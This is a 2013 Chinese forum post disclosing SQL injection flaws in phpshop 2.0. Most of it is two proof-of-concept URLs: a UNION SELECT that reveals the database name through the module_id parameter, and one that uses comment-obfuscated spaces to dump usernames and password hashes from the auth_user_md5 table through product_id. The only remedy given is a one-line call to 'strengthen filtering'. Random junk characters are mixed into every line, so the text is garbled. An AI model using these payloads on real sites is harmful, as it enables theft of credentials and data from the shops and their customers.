标题 : phpshop 2.0 SQL Injection Vulnerability
8 s7 N X; @9 m# D0 Z
" E) @ r5 k& J" D' E; _作者 : By onestree. A7 {- E" i3 r: U; P, U" B' @5 i5 p
下载地址 : http://code.google.com/p/phpshop/downloads/list0 x; @4 E% d0 ~& S: R8 _* {
测试地址: windows 7 / ubuntu
& W/ }, a& a/ o5 `1 L
0 m: v% Y3 t: s9 B5 m% Z4 P5 w5 C
6 f& w$ }8 Y7 L+ l# ]SQLi p0c:
6 q. f5 e4 ?1 V7 I# u" }$ Y* u4 L , }2 j r4 y& R* C5 ?
==================
, `' p. i& `! ~) X0 G # R0 Q- p0 A7 s% [; Q
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
T/ v+ g' n& [. Lunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --' O% ?7 \+ ]/ x! i; Y9 e6 t- a
- C" u9 v: B8 t- o1 }3 ?9 w
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--/ b- ?3 i1 b, H) \
5 C( |/ _2 \: r! y$ V& [# Y修复:& s$ x& F2 s* {. S& O; d
加强过滤
: Y- c9 u" ` z- ~( ^
( b \; J/ M* {2 i: C# Y5 p8 Q
( X9 Z6 b7 o' V5 ~, S3 [7 z) }* J |
发表于 2013-1-18 18:24:10
收藏
支持
反对